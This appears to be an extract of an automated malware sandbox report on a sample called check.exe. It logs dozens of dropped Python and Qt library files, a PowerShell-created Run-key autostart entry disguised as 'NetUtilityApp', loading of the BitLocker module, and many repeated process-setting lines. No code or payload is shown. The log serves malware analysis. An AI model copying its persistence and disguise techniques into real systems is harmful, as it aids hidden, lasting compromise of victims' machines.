Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetUtilityAppJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,4_2_00007FF7124F5830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
